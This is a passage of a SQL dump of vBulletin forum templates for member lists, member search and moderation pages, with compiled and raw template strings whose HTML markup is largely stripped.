    \" . construct_phrase(\"$vbphrase[profile_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$message[profileuserid]&vmid=$message[vmid]#vmessage$message[vmid]\", \"$message[profileusername]\") . \"
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n
    \r\n\r\n \" . construct_phrase(\"$vbphrase[message_hidden_x_on_ignore_list]\", \"$message[username]\", \"profile.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"do=ignorelist\") . \"\r\n
    \r\n
  • ', '
  • \r\n
    \r\n
    \r\n \r\n
    $message[date] $message[time]
    \r\n $message[musername]\r\n\r\n \r\n
    $vbphrase[profile_x]
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n\r\n $vbphrase[message_hidden_x_on_ignore_list]\r\n
    \r\n
  • ', 'template', 1204631374, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1393, -1, 'memberlist', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[members_list]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $letterbits\r\n\r\n
    \r\n\r\n\".(($show[\'popups\'] AND !$show[\'usergroup\']) ? (\"\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'advancedlink\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[search_members]
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n $gobutton\r\n
    session->vars[\'sessionurl\'] . \"do=search\\\">$vbphrase[advanced_search]
    \r\n
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n \".((!$show[\'usergroup\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n\r\n
    \r\n \r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$totalusers\") . \"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[search_took_x_seconds]\", \"$searchtime\") . \"\r\n
    \r\n \".(($show[\'usergroup\']) ? (\"\r\n $vbphrase[members_of_usergroup]: $leadergroup[title]\r\n \") : (\"\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \": $vbphrase[members_list]\r\n \")).\"\r\n
    session->vars[\'sessionurl\'] . \"do=search\\\">$vbphrase[search_members]
    \r\n\r\n\r\n\r\n \r\n \".(($show[\'emailcol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'imicons\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'homepagecol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'searchcol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'datejoinedcol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'postscol\']) ? (\"\") : (\"\")).\"\r\n\r\n \".(($show[\'lastvisitcol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'reputationcol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'avatarcol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'profilepiccol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'birthdaycol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'agecol\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'customfields\']) ? (\"$customfieldsheader\") : (\"\")).\"\r\n \".(($show[\'usergroup\']) ? (\"\") : (\"\")).\"\r\n\r\n$memberlistbits\r\n\r\n \r\n\r\n
    $vbphrase[username] $sortarrow[username]$vbphrase[contact]$vbphrase[instant_messaging]$vbphrase[home_page]$vbphrase[find_posts]$vbphrase[join_date] $sortarrow[joindate]$vbphrase[posts] $sortarrow[posts]$vbphrase[last_visit] $sortarrow[lastvisit]$vbphrase[reputation] $sortarrow[reputation]$vbphrase[avatar]$vbphrase[profile_picture]$vbphrase[birthday]$vbphrase[age] $sortarrow[age]
    \r\n \r\n \".(($show[\'usergroup\']) ? (\"\r\n \r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$totalusers\") . \"\r\n \")).\"\r\n \r\n
    \r\n\r\n
    \r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n\") : (\"\")).\"\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $vbphrase[members_list]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n $letterbits\r\n\r\n
    \r\n\r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[search_members]
    \r\n \r\n \r\n \r\n $gobutton\r\n
    $vbphrase[advanced_search]
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n \r\n $vbphrase[showing_results_x_to_y_of_z]\r\n
    \r\n $vbphrase[search_took_x_seconds]\r\n
    \r\n \r\n $vbphrase[members_of_usergroup]: $leadergroup[title]\r\n \r\n $vboptions[bbtitle]: $vbphrase[members_list]\r\n \r\n
    $vbphrase[search_members]
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $customfieldsheader\r\n \r\n\r\n$memberlistbits\r\n\r\n \r\n\r\n
    &order=ASC&sort=username&pp=$perpage$usergrouplink\">$vbphrase[username] $sortarrow[username]$vbphrase[contact]$vbphrase[instant_messaging]$vbphrase[home_page]$vbphrase[find_posts]&order=ASC&sort=joindate&pp=$perpage$usergrouplink\">$vbphrase[join_date] $sortarrow[joindate]&order=DESC&sort=posts&pp=$perpage$usergrouplink\">$vbphrase[posts] $sortarrow[posts]&order=DESC&sort=lastvisit&pp=$perpage$usergrouplink\">$vbphrase[last_visit] $sortarrow[lastvisit]&order=DESC&sort=reputation&pp=$perpage$usergrouplink\">$vbphrase[reputation] $sortarrow[reputation]$vbphrase[avatar]$vbphrase[profile_picture]$vbphrase[birthday]&order=ASC&sort=age&pp=$perpage$usergrouplink\">$vbphrase[age] $sortarrow[age]
    \r\n \r\n \r\n \r\n \r\n $vbphrase[showing_results_x_to_y_of_z]\r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n \r\n\r\n
    $pagenav
    \r\n
    \r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212144677, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1394, -1, 'memberlist_letter', '\".(($show[\'selectedletter\']) ? (\"\r\n[$currentletter]\r\n\") : (\"\r\nsession->vars[\'sessionurl\'] . \"ltr=$linkletter&pp=$perpage&sort=$sortfield&order=$sortorder$usergrouplink$ltrurl\\\">$currentletter\r\n\")).\"', '\r\n[$currentletter]\r\n\r\n$currentletter\r\n', 'template', 1210086457, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1395, -1, 'memberlist_resultsbit', '\r\n \r\n session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\\\">$userinfo[musername]\r\n \".(($show[\'usertitlecol\']) ? (\"
    $userinfo[usertitle]
    \") : (\"\")).\"\r\n \r\n \".(($show[\'emailcol\'] AND exec_switch_bg()) ? (\"\".(($show[\'emaillink\']) ? (\"session->vars[\'sessionurl\'] . \"do=mailmember&u=$userinfo[userid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\">\\\"email.gif\\\"\") : (\"\")).\" \".(($show[\'pmlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=newpm&u=$userinfo[userid]\\\" target=\\\"_blank\\\" rel=\\\"nofollow\\\">\\\"sendpm.gif\\\"\") : (\"\")).\"\") : (\"\")).\"\r\n \".(($show[\'imicons\'] AND exec_switch_bg()) ? (\"$userinfo[icqicon] $userinfo[aimicon] $userinfo[msnicon] $userinfo[yahooicon] $userinfo[skypeicon]\") : (\"\")).\"\r\n \".(($show[\'homepagecol\'] AND exec_switch_bg()) ? (\"\".(($show[\'homepagelink\']) ? (\"\\\"home.gif\\\"\") : (\" \")).\"\") : (\"\")).\"\r\n \".(($show[\'searchcol\'] AND exec_switch_bg()) ? (\"\".(($show[\'searchlink\']) ? (\"session->vars[\'sessionurl\'] . \"do=finduser&u=$userinfo[userid]\\\" rel=\\\"nofollow\\\">\\\"find.gif\\\"\") : (\" \")).\"\") : (\"\")).\"\r\n \".(($show[\'datejoinedcol\'] AND exec_switch_bg()) ? (\"$userinfo[datejoined]\") : (\"\")).\"\r\n \".(($show[\'postscol\'] AND exec_switch_bg()) ? (\"$userinfo[posts]\") : (\"\")).\"\r\n \".(($show[\'lastvisitcol\'] AND exec_switch_bg()) ? (\"$userinfo[lastvisit]\") : (\"\")).\"\r\n \".(($show[\'reputationcol\'] AND exec_switch_bg()) ? (\"$userinfo[reputationdisplay]\") : (\"\")).\"\r\n \".(($show[\'avatarcol\'] AND exec_switch_bg()) ? (\"\".(($show[\'avatar\']) ? (\"\\\"\"\") : (\" \")).\"\") : (\"\")).\"\r\n \".(($show[\'profilepiccol\'] AND exec_switch_bg()) ? (\"$userinfo[profilepic]\") : (\"\")).\"\r\n \".(($show[\'birthdaycol\'] AND exec_switch_bg()) ? (\"$userinfo[birthday]\") : (\"\")).\"\r\n \".(($show[\'agecol\'] AND exec_switch_bg()) ? (\"$userinfo[age]\") : (\"\")).\"\r\n \".(($show[\'customfields\']) ? (\"$customfields\") : (\"\")).\"\r\n \".(($show[\'usergroup\'] AND exec_switch_bg()) ? (\"\".(($show[\'hideleader\']) ? (\" \") : (\"\")).\"\") : (\"\")).\"\r\n', '\r\n \r\n $userinfo[musername]\r\n
    $userinfo[usertitle]
    \r\n \r\n \"email.gif\"$vbphrase[click_here_to_email_x]\" border=\"0\" /> \"sendpm.gif\"$vbphrase[send_private_message_to_x]\" border=\"0\" />\r\n $userinfo[icqicon] $userinfo[aimicon] $userinfo[msnicon] $userinfo[yahooicon] $userinfo[skypeicon]\r\n \"home.gif\"$vbphrase[visit_xs_homepage]\" border=\"0\" /> \r\n \"find.gif\"$vbphrase[find_all_posts_by_x]\" border=\"0\" /> \r\n $userinfo[datejoined]\r\n $userinfo[posts]\r\n $userinfo[lastvisit]\r\n $userinfo[reputationdisplay]\r\n \"<phrase$vbphrase[xs_avatar]\" hspace=\"4\" vspace=\"4\" /> \r\n $userinfo[profilepic]\r\n $userinfo[birthday]\r\n $userinfo[age]\r\n $customfields\r\n  \r\n', 'template', 1131117410, 'vBulletin Solutions', '3.5.2', 'vbulletin'), (1396, -1, 'memberlist_resultsbit_field', '$customfield', '$customfield', 'template', 1070923933, 'vBulletin Solutions', '', 'vbulletin'), (1397, -1, 'memberlist_results_header', '$customfield', '$customfield', 'template', 1070923876, 'vBulletin Solutions', '', 'vbulletin'), (1398, -1, 'memberlist_search', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[members_list] - $vbphrase[search]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[members_list] - $vbphrase[search]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[fields_on_form_optional]\r\n
    \r\n\r\n
    \r\n $vbphrase[username]\r\n
    \r\n \".(($show[\'popups\']) ? (\"\r\n
    \r\n \r\n \r\n \") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n $vbphrase[home_page]
    \r\n \r\n
    \r\n\r\n $customfields\r\n\r\n
    \r\n $vbphrase[instant_messaging]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[icq_number]
    \r\n \\\"\\\"\r\n \r\n
    \r\n $vbphrase[aim_screen_name]
    \r\n \\\"\\\"\r\n \r\n
    \r\n $vbphrase[msn_messenger_handle]
    \r\n \\\"\\\"\r\n \r\n
    \r\n $vbphrase[yahoo_messenger_handle]
    \r\n \\\"\\\"\r\n \r\n
    \r\n $vbphrase[skype_name]
    \r\n \\\"\\\"\r\n \r\n
     
    \r\n
    \r\n\r\n
    \r\n $vbphrase[post_count]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[is_greater_than_or_equal_to]
    \r\n \r\n
    \r\n $vbphrase[is_less_than]
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[join_date]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[is_after]
    \r\n \r\n
    \r\n $vbphrase[is_before]
    \r\n \r\n
    $vbphrase[please_use_format]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[last_post]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[is_after]
    \r\n \r\n
    \r\n $vbphrase[is_before]
    \r\n \r\n
    $vbphrase[please_use_format_yyyymmdd_hhmmss]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    $vbphrase[options]
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[options]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[order_results_by]
    \r\n \r\n \r\n
    \r\n $vbphrase[number_of_users_perpage]
    \r\n options[\'memberlistperpage\'] . \"\\\" />\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n $vboptions[bbtitle] - $vbphrase[members_list] - $vbphrase[search]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[members_list] - $vbphrase[search]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[fields_on_form_optional]\r\n
    \r\n\r\n
    \r\n $vbphrase[username]\r\n
    \r\n \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[home_page]
    \r\n \r\n
    \r\n\r\n $customfields\r\n\r\n
    \r\n $vbphrase[instant_messaging]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[icq_number]
    \r\n \"\"\r\n \r\n
    \r\n $vbphrase[aim_screen_name]
    \r\n \"\"\r\n \r\n
    \r\n $vbphrase[msn_messenger_handle]
    \r\n \"\"\r\n \r\n
    \r\n $vbphrase[yahoo_messenger_handle]
    \r\n \"\"\r\n \r\n
    \r\n $vbphrase[skype_name]
    \r\n \"\"\r\n \r\n
     
    \r\n
    \r\n\r\n
    \r\n $vbphrase[post_count]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[is_greater_than_or_equal_to]
    \r\n \r\n
    \r\n $vbphrase[is_less_than]
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[join_date]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[is_after]
    \r\n \r\n
    \r\n $vbphrase[is_before]
    \r\n \r\n
    $vbphrase[please_use_format]
    \r\n
    \r\n\r\n
    \r\n $vbphrase[last_post]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[is_after]
    \r\n \r\n
    \r\n $vbphrase[is_before]
    \r\n \r\n
    $vbphrase[please_use_format_yyyymmdd_hhmmss]
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    $vbphrase[options]
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[options]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $vbphrase[order_results_by]
    \r\n \r\n \r\n
    \r\n $vbphrase[number_of_users_perpage]
    \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1212581967, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1399, -1, 'memberlist_search_optional_input', '$vbphrase[or]: ', '$vbphrase[or]: ', 'template', 1070078629, 'vBulletin Solutions', '', 'vbulletin'), (1400, -1, 'memberlist_search_radio', '
    \r\n $profilefield[title]:
    \r\n \".(($radiobits) ? (\"$radiobits
    \") : (\"\")).\"\r\n $optionalfield\r\n
    \r\n', '
    \r\n $profilefield[title]:
    \r\n $radiobits
    \r\n $optionalfield\r\n
    \r\n', 'template', 1199995144, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1401, -1, 'memberlist_search_select', '
    \r\n $profilefield[title]:
    \r\n \r\n $optionalfield\r\n
    \r\n', '
    \r\n $profilefield[title]:
    \r\n \r\n $optionalfield\r\n
    \r\n', 'template', 1069675772, 'vBulletin Solutions', '', 'vbulletin'), (1402, -1, 'memberlist_search_select_multiple', '
    \r\n $profilefield[title]:
    \r\n \r\n
    \r\n', '
    \r\n $profilefield[title]:
    \r\n \r\n
    \r\n', 'template', 1072806069, 'vBulletin Solutions', '', 'vbulletin'), (1403, -1, 'memberlist_search_textbox', '
    \r\n $profilefield[title]:
    \r\n userinfo[$profilefieldname] . \"\\\" size=\\\"$profilefield[size]\\\" maxlength=\\\"$profilefield[maxlength]\\\" />\r\n
    \r\n', '
    \r\n $profilefield[title]:
    \r\n \r\n
    \r\n', 'template', 1069675812, 'vBulletin Solutions', '', 'vbulletin'), (1404, -1, 'moderation_deletepictures', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[delete_pictures]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_pictures]
    \r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[deleting_x_pictures_from_y_albums]\", \"$picturecount\", \"$albumcount\") . \"
    \r\n\r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[delete_pictures]\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[delete_pictures]
    \r\n
    \r\n\r\n
    $vbphrase[deleting_x_pictures_from_y_albums]
    \r\n\r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875904, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1405, -1, 'moderation_filter', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\".(($show[havemessages]) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n
    $vbphrase[display_options]
    \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$first\", \"$last\", \"$messagetotal\") . \"
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[display_options]
    $vbphrase[showing_results_x_to_y_of_z]
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    ', 'template', 1214581775, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1406, -1, 'moderation_groupdiscussions', '\".(($messagetotal) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \".((!$messagetotal) ? (\"\r\n \r\n \r\n \r\n
    \r\n $messagephrase\r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \") : (\"\r\n \r\n \r\n \".(($messagetotal) ? (\"\r\n $vbphrase[discussion]\r\n $vbphrase[group_created]\r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[messages]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n $messagebits\r\n \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
    \r\n \".(($pagenav) ? (\"\r\n
    \r\n $pagenav\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n
    \r\n
    \r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'postlink\']) ? (\"\") : (\"\")).\"\r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n\r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n
    \r\n \r\n\")).\"\r\n\r\n
    \r\n\r\n$moderation_filter', '\r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n $messagephrase\r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \r\n \r\n \r\n \r\n $vbphrase[discussion]\r\n $vbphrase[group_created]\r\n \r\n \r\n \r\n $vbphrase[messages]\r\n \r\n \r\n $vbphrase[last_post]\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $messagebits\r\n \r\n\r\n \r\n
    \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \r\n
    push_down\">\r\n
    \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n \r\n\r\n \r\n\r\n \r\n
      \r\n
    • $vbphrase[from_this_page]
    • \r\n
    • $vbphrase[select_all]
    • \r\n
    • $vbphrase[deselect_all]
    • \r\n
    • $vbphrase[invert_selection]
    • \r\n
    \r\n \r\n
    \r\n\r\n \r\n\r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n$moderation_filter', 'template', 1217933213, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1407, -1, 'moderation_groupmessages', '$memberinfo_css\r\n$socialgroups_css\r\n\r\n\r\n\r\n\".(($messagetotal) ? (\"\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n \".(($messagetotal) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $vbphrase[messages]: $messagetotal\r\n $messagephrase\r\n
    \r\n\r\n \".((!$messagetotal) ? (\"\r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \") : (\"\r\n
      \r\n $messagebits\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \".(($pagenav) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \")).\"\r\n
    \r\n\r\n\".(($messagetotal) ? (\"\r\n
    \r\n\") : (\"\")).\"\r\n\r\n
    \r\n\r\n$moderation_filter', '$memberinfo_css\r\n$socialgroups_css\r\n\r\n\r\n\r\n\r\n
    \r\n \r\n \r\n \r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n \r\n $vbphrase[messages]: $messagetotal\r\n $messagephrase\r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \r\n
      \r\n $messagebits\r\n
    \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n$moderation_filter', 'template', 1213102244, 'vBulletin Solutions', '3.7.1', 'vbulletin'), (1408, -1, 'moderation_picturebit', '
  • \r\n \r\n \r\n \r\n \r\n \r\n
    options[\'album_thumbsize\'] . \"\\\">\r\n \".(($pictureinfo[\'thumburl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$pictureinfo[albumid]&pictureid=$pictureinfo[pictureid]\\\">\\\"$pictureinfo[caption_preview]\\\"\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$pictureinfo[albumid]&pictureid=$pictureinfo[pictureid]\\\">\".(($pictureinfo[\'caption_preview\']) ? (\"$pictureinfo[caption_preview]\") : (\"$vbphrase[picture]\")).\"\r\n \")).\"\r\n \r\n
    \r\n
    \r\n \".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n
    $picture[date]\".((!$show[\'detailedtime\']) ? (\" $picture[time]\") : (\"\")).\"
    \r\n session->vars[\'sessionurl\'] . \"u=$picture[userid]\\\" class=\\\"smallfont username\\\">$picture[musername]\r\n
    \r\n
    \r\n
    \r\n \".(($show[\'moderation\']) ? (\"
    $vbphrase[this_message_is_moderated]
    \") : (\"\")).\"\r\n
    $vbphrase[caption]: $pictureinfo[caption_preview]
    \r\n
    $vbphrase[album]: $picture[albumtitle]
    \r\n
    $vbphrase[date]: $pictureinfo[date]\".((!$show[\'detailedtime\']) ? (\" $pictureinfo[time]\") : (\"\")).\"
    \r\n
    \r\n
    \r\n
  • ', '
  • \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n \r\n \"$pictureinfo[caption_preview]\"\r\n \r\n $pictureinfo[caption_preview]$vbphrase[picture]\r\n \r\n \r\n
    \r\n
    \r\n \r\n
    $picture[date] $picture[time]
    \r\n $picture[musername]\r\n
    \r\n
    \r\n
    \r\n
    $vbphrase[this_message_is_moderated]
    \r\n
    $vbphrase[caption]: $pictureinfo[caption_preview]
    \r\n
    $vbphrase[album]: $picture[albumtitle]
    \r\n
    $vbphrase[date]: $pictureinfo[date] $pictureinfo[time]
    \r\n
    \r\n
    \r\n
  • ', 'template', 1219147961, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1409, -1, 'moderation_picturecomments', '$memberinfo_css\r\n\r\n\r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n \".(($show[\'havemessages\']) ? (\"\") : (\"\")).\"$vbphrase[messages]: $messagetotal\r\n $messagephrase\r\n
    \r\n \".((!$show[\'havemessages\']) ? (\"\r\n
    \r\n $vbphrase[no_posts_found]
    \r\n $vbphrase[try_controls_below_for_older_posts]\r\n
    \r\n \") : (\"\r\n
      \r\n $messagebits\r\n
    \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
    \r\n \r\n \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($pagenav) ? (\"\r\n \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n $pagenav\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n \")).\"\r\n
